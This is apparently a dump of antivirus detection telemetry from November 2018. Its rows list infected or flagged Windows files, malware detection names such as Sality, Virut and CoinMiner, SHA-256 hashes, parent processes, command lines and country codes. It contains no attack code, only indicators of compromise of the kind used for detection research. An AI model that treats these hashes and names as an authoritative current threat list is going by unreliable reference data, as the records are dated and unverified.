  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T21:36:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2021e904.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2021e904.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205249-64a581fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47e9d95a\\AVSCAN-20181104-205231-612CFB04\\AVSCAN-20181104-205249-64A581FC', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wclose.exe', filepath='E:\\VOLN\\voln 2018-11-04 04;43;59\\SFCI\\ctc\\arhiva\\CHIMIC\\Documente arhivate ch_disc C\\Program Files\\ClamWin\\bin\\WClose.exe', filesize=2048000, name='W32/Sality.AW.#M1.#R1'), hash='1ad9a8921990414d23749da647ec61fab225eac31439e3affa8b833010c6daa2', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Cobian Backup 11\\Cobian.exe', parentsize=720896, timestamp='2018-11-04T10:02:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nod32.exe', filepath='\\\\?\\D:\\util\\Antivirus & security\\ESET\\nod32.exe', filesize=496000, name='W32/Sality.Patched.#M1.#R1'), hash='675a8777521c026af2c9c99e72bc4e7839d0edb4e9f2b41d8ad37836c93d3d0b', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:40:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131636-2f7fca4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131636-2F7FCA4D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='38516d49d35de1b32787ab35da024a3ea57d174c569dd630a797e2d06dacae93', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T16:03:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152051-2c600e54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152051-2C600E54', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145256-4cde9510', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-145256-4CDE9510', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='844393847a1b655a9f2df69e63b820eebcd04b94635b5f5e3d63df7de3990aa6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:22:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000045', filepath='C:\\Windows\\Temp\\tmp000001cb\\tmp00000045', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emsisoft Anti-Malware\\a2service.exe', parentsize=9449800, timestamp='2018-11-04T20:44:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uts1.exe', filepath='G:\\Users\\X\\Downloads\\Document\\Algo Laporan\\UTS1.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='0390d00a37856c7fd9cdd13b74671ac4088c254759c3d94ffd4540cd7854d4e3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='freestudio.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\extra\\FreeStudio.exe', filesize=62692000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='3e2d0d88accb84542d6e2fa118e14a29837f00710cf393205b457e2b72333d41', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:25:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='arles papa juin 2014 .exe', filepath='C:\\Users\\X\\Documents\\Arles papa_031118\\Arles Papa Juin 2014\\Arles Papa Juin 2014 .exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R2969'), hash='036452ed8e9dd37d84f2d04db5df92a1ddce21ed9c1a21eefa84709bebbd5bc5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T09:25:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145340-52b7b666', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_128ca42a\\AVSCAN-20181104-145314-4F4C5781\\AVSCAN-20181104-145340-52B7B666', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194832-5bf565c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72dc2add\\AVSCAN-20181104-193834-0F7E98A2\\AVSCAN-20181104-194832-5BF565C1', filesize=1544000, name='PUA/InstallCore.#M1.#R1'), hash='a6af29130b37d8eb0e1b3b0d4a52a72e995de380595d877700aa54d5d593e40d', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:48:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152651-16b7325c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5221eeda\\AVSCAN-20181104-152607-1099E0A6\\AVSCAN-20181104-152651-16B7325C', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:26:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155202-e538de52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c0dea55\\AVSCAN-20181104-154709-D42DD0CE\\AVSCAN-20181104-155202-E538DE52', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:52:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='saveeditor.exe', filepath='g:\\العاب شبكه\\need for speed most wanted on\\SaveEditor.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='2e5aad637256e5c8af22c9b061b9e1ba12cb71f9fbb709b626d01b17ccc443c4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215640-bbbd277d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215640-BBBD277D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-041411-1d87f001', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ea081ba\\AVSCAN-20181105-041341-19A8E908\\AVSCAN-20181105-041411-1D87F001', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:13:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hhupd.exe', filepath='\\\\?\\D:\\Quick sale 2016\\SQL_server_2000\\SQL_server_2000\\X86\\BINN\\HHUPD.EXE', filesize=804000, name='W32/Sality.AT.#M1.#R1'), hash='c9872f1155202da29fff475e2e0aa81c874257c06e9874db5c471059b6f62447', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T10:01:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123631-2d5d13d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-123631-2D5D13D7', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:22:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210552-96a2332d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210552-96A2332D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:05:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:26:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214640-4fa43372', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214640-4FA43372', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213629-b549f31b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-213629-B549F31B', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:01:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='assassinscreedrevelations.exe', filepath='D:\\Black_Box\\Assassins Creed - Revelations\\AssassinsCreedRevelations.exe', filesize=768000, name='W32/Jeefo.A.#M1.#R1'), hash='3d49bf6c0f801ab808324bc5511856dd3c1c9c8de34192396465aaa16279500c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:29:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102342-b785c3a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102342-B785C3A2', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8be32e9e-34fa-29ff-cab7-f9270af6bd8b.exe', filepath='G:\\\xa0\\{9fa9aac9-c45e-7dfa-290a-56ae3b9c6186}\\8be32e9e-34fa-29ff-cab7-f9270af6bd8b.exe', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:41:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-134831-aaccadb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab583275\\AVSCAN-20181102-134728-9D69206C\\AVSCAN-20181102-134831-AACCADB1', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.gh', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\GamerHash\\miners\\ewbf_v1\\miner.gh', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wallpapers.exe', filepath='I:\\WallPapers.exe', filesize=960000, name='W32/Virut.Gen.#M1.#R1'), hash='c397105285874066503c5aa427f6e6cf7c4b1268fe539dd4100b1d60e77aaeca', metadata=Row(cmdline='rtp', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T09:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204453-6c68eb3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-204453-6C68EB3F', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:44:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jrdlahmc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\jRdLaHmC.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evcreate.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\evcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9a55f7cadd5ffb14ae6cf9dc8955b09233830461091378fe1476ebeef4431e23', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Zec Miner 0.3.4b\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\Zec Miner 0.3.4b.zip\\\\\\" \\\\\\"C:\\\\\\\\Users\\\\\\\\User\\\\\\\\Desktop\\\\\\\\Zec Miner 0.3.4b\\\\\\\\\\\\\\"', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1163264, timestamp='2018-11-02T03:27:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:32:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='golf.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\GOLF\\GOLF.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trz80bb.tmp', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\trz80BB.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165713-2e690110', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2914d8c8\\AVSCAN-20181102-165637-29E55BE6\\AVSCAN-20181102-165713-2E690110', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='C:\\Windows\\SysWOW64\\taskeng.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='d46f58fdd8d6d8761158ce86213a79db317a2c20346d5f479ad5125563666197', metadata=Row(cmdline='blacknull', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Conquer Online 2.099999999777\\Env_DX9\\Conquer.exe', parentsize=10237328, timestamp='2018-11-02T11:38:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ecxjptha.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\eCxJPtha.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:13:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsoFB7D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:07:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\CamStudio 2.7\\msiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='--engine=2 --session-id=uGYsmGd9pMbzVPOkTCpf8NWJfFn53qve\\\\\\/e6ydHiI --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T16:44:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214314-a6176c93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4396dbe3\\AVSCAN-20181102-214109-9544D9A4\\AVSCAN-20181102-214314-A6176C93', filesize=512000, name='PUA/BitcoinMiner.#M1.#R1'), hash='ed2bf137cee94994bf53304ca1c1b17672d0543b8c7b124bce28a3199ff7e57e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:43:13Z'), dt=datetime.date(2018, 11, 2)),
